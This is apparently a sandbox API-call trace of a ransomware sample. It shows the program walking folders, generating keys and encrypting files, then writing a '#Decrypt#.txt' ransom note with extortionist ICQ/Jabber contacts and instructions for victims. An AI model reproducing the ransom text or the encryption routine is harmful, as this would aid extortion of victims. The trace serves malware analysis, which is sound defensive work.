ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49edb2bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2666c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.419] lstrcmpiW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.419] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 86 [0251.419] StrStrIW (lpFirst="BabyBoyNotesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.419] lstrcmpW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.419] lstrcmpW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.419] lstrlenW (lpString=".testttjffg") returned 11 [0251.419] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.419] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.419] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.420] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70f5a70d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70f5a70d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f0141b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2472c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyScenesBackground.wmv", cAlternateFileName="")) returned 1 [0251.420] lstrcmpiW (lpString1="BabyBoyScenesBackground.wmv", lpString2="Windows") returned -1 [0251.420] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 83 [0251.420] StrStrIW (lpFirst="BabyBoyScenesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.420] lstrcmpW (lpString1="BabyBoyScenesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.420] lstrcmpW (lpString1="BabyBoyScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.420] lstrlenW (lpString=".testttjffg") returned 11 [0251.420] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.420] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.420] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.421] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70f8086a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70f8086a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f0141b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1e96c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.421] lstrcmpiW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.421] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv") returned 87 [0251.421] StrStrIW (lpFirst="BabyBoyScenesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.421] lstrcmpW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.421] lstrcmpW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.421] lstrlenW (lpString=".testttjffg") returned 11 [0251.421] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.421] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.421] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.422] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.422] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fa69c7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70fa69c7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f0141b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="LightBlueRectangle.PNG", cAlternateFileName="")) returned 1 [0251.422] lstrcmpiW (lpString1="LightBlueRectangle.PNG", lpString2="Windows") returned -1 [0251.422] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG") returned 78 [0251.422] StrStrIW (lpFirst="LightBlueRectangle.PNG", lpSrch=".horseleader") returned 0x0 [0251.422] lstrcmpW (lpString1="LightBlueRectangle.PNG", lpString2="#Decrypt#.txt") returned 1 [0251.422] lstrcmpW (lpString1="LightBlueRectangle.PNG", lpString2="_uninstalling_.png") returned 1 [0251.422] lstrlenW (lpString=".testttjffg") returned 11 [0251.422] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG", lpSrch=".testttjffg") returned 0x0 [0251.422] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.422] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.422] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\lightbluerectangle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.423] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fccb24, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70fccb24, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f27579, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb6a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="MainMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.423] lstrcmpiW (lpString1="MainMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.423] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png") returned 78 [0251.423] StrStrIW (lpFirst="MainMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.423] lstrcmpW (lpString1="MainMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.423] lstrcmpW (lpString1="MainMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.423] lstrlenW (lpString=".testttjffg") returned 11 [0251.423] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.423] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.423] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.423] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\mainmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.423] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7103ef3b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7103ef3b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf63, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="navSubpicture.png", cAlternateFileName="")) returned 1 [0251.423] lstrcmpiW (lpString1="navSubpicture.png", lpString2="Windows") returned -1 [0251.423] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png") returned 73 [0251.424] StrStrIW (lpFirst="navSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.424] lstrcmpW (lpString1="navSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.424] lstrcmpW (lpString1="navSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.424] lstrlenW (lpString=".testttjffg") returned 11 [0251.424] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.424] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.424] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.424] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\navsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.425] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fccb24, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70fccb24, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f27579, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1197, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="nav_leftarrow.png", cAlternateFileName="")) returned 1 [0251.425] lstrcmpiW (lpString1="nav_leftarrow.png", lpString2="Windows") returned -1 [0251.425] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 73 [0251.425] StrStrIW (lpFirst="nav_leftarrow.png", lpSrch=".horseleader") returned 0x0 [0251.425] lstrcmpW (lpString1="nav_leftarrow.png", lpString2="#Decrypt#.txt") returned 1 [0251.425] lstrcmpW (lpString1="nav_leftarrow.png", lpString2="_uninstalling_.png") returned 1 [0251.425] lstrlenW (lpString=".testttjffg") returned 11 [0251.425] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png", lpSrch=".testttjffg") returned 0x0 [0251.425] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.426] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.426] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.426] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ff2c81, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ff2c81, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f27579, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11a3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="nav_rightarrow.png", cAlternateFileName="")) returned 1 [0251.426] lstrcmpiW (lpString1="nav_rightarrow.png", lpString2="Windows") returned -1 [0251.426] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png") returned 74 [0251.426] StrStrIW (lpFirst="nav_rightarrow.png", lpSrch=".horseleader") returned 0x0 [0251.426] lstrcmpW (lpString1="nav_rightarrow.png", lpString2="#Decrypt#.txt") returned 1 [0251.426] lstrcmpW (lpString1="nav_rightarrow.png", lpString2="_uninstalling_.png") returned 1 [0251.426] lstrlenW (lpString=".testttjffg") returned 11 [0251.426] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png", lpSrch=".testttjffg") returned 0x0 [0251.427] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.427] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_rightarrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.427] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71018dde, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71018dde, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1068, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="nav_uparrow.png", cAlternateFileName="")) returned 1 [0251.427] lstrcmpiW (lpString1="nav_uparrow.png", lpString2="Windows") returned -1 [0251.427] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png") returned 71 [0251.427] StrStrIW (lpFirst="nav_uparrow.png", lpSrch=".horseleader") returned 0x0 [0251.427] lstrcmpW (lpString1="nav_uparrow.png", lpString2="#Decrypt#.txt") returned 1 [0251.427] lstrcmpW (lpString1="nav_uparrow.png", lpString2="_uninstalling_.png") returned 1 [0251.428] lstrlenW (lpString=".testttjffg") returned 11 [0251.428] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png", lpSrch=".testttjffg") returned 0x0 [0251.428] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.428] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_uparrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.428] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71018dde, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71018dde, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1068, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="nav_uparrow.png", cAlternateFileName="")) returned 0 [0251.428] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.429] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\#Decrypt#.txt") returned 69 [0251.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.431] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.431] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.432] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.433] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.433] CloseHandle (hObject=0x158) returned 1 [0251.433] GetProcessHeap () returned 0x780000 [0251.433] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.433] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BabyGirl", cAlternateFileName="")) returned 1 [0251.433] lstrcmpiW (lpString1="BabyGirl", lpString2="Windows") returned -1 [0251.433] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 56 [0251.433] lstrcmpW (lpString1="BabyGirl", lpString2=".") returned 1 [0251.433] lstrcmpW (lpString1="BabyGirl", lpString2="..") returned 1 [0251.433] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.433] GetProcessHeap () returned 0x780000 [0251.433] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.434] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*") returned 58 [0251.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, 